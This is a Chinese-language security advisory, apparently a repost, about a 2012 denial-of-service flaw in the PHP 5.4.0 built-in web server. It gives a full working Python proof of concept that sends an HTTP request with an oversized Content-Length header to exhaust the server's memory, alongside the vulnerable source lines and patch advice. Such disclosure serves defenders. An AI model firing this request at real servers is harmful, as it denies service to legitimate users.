Length'标头远程服务访问漏洞

发布日期:2012-03-24
更新日期:2012-03-27

受影响系统:
PHP PHP 5.5.0-DEV
PHP PHP 5.4.1RC1-DEV
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52704

PHP是一种在电脑上运行的脚本语言,主要用途是在于处理动态网页,包含了命令行运行接口或者产生图形用户界面程序。

PHP在实现上存在远程拒绝服务漏洞,如果发送带有较大的Content-Length标头值的HTTP请求到内置的PHP网络服务器,攻击者可利用此漏洞耗尽可用的内存,拒绝服务合法用户。

<*来源:vendor
 
  链接:https://bugs.php.net/bug.php?id=61461
             
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/python

# Title:      PHP 5.4.0 Built-in Web Server DoS PoC
# Date:       16 March 2012
# Author:     ls (contact@kaankivilcim.com)
# Reference:  https://bugs.php.net/bug.php?id=61461
# Comments:   Fixed in PHP 5.4.1RC1-DEV and 5.5.0-DEV

# The value of the Content-Length header is passed directly to a pemalloc() call in sapi/cli/php_cli_server.c
# on line 1538. The inline function defined within Zend/zend_alloc.h for malloc() will fail, and will terminate
# the process with the error message "Out of memory".
#
# 1537 if (!client->request.content) {
# 1538   client->request.content = pemalloc(parser->content_length, 1);
# 1539   client->request.content_len = 0;
# 1540 }
#
# PHP 5.4.0 Development Server started at Tue Mar 13 19:41:45 2012
# Listening on 127.0.0.1:80
# Document root is /tmp
# Press Ctrl-C to quit.
# Out of memory

import socket, sys

target = "127.0.0.1"
port   = 80;

request  = "POST / HTTP/1.1\n"
request += "Content-Type: application/x-www-form-urlencoded\n"
request += "Content-Length: 2147483638\n\n" # <-- Choose size larger than the available memory on target
request += "A=B\n\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((target, port))
except:
  print "[-] Connection to %s:%s failed!" % (target, port)
  sys.exit(0)

print "[+] Sending HTTP request. Check for crash on target."

s.send(request)
s.close()

建议:
--------------------------------------------------------------------------------
厂商补丁:

PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

linux

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwgjjs.html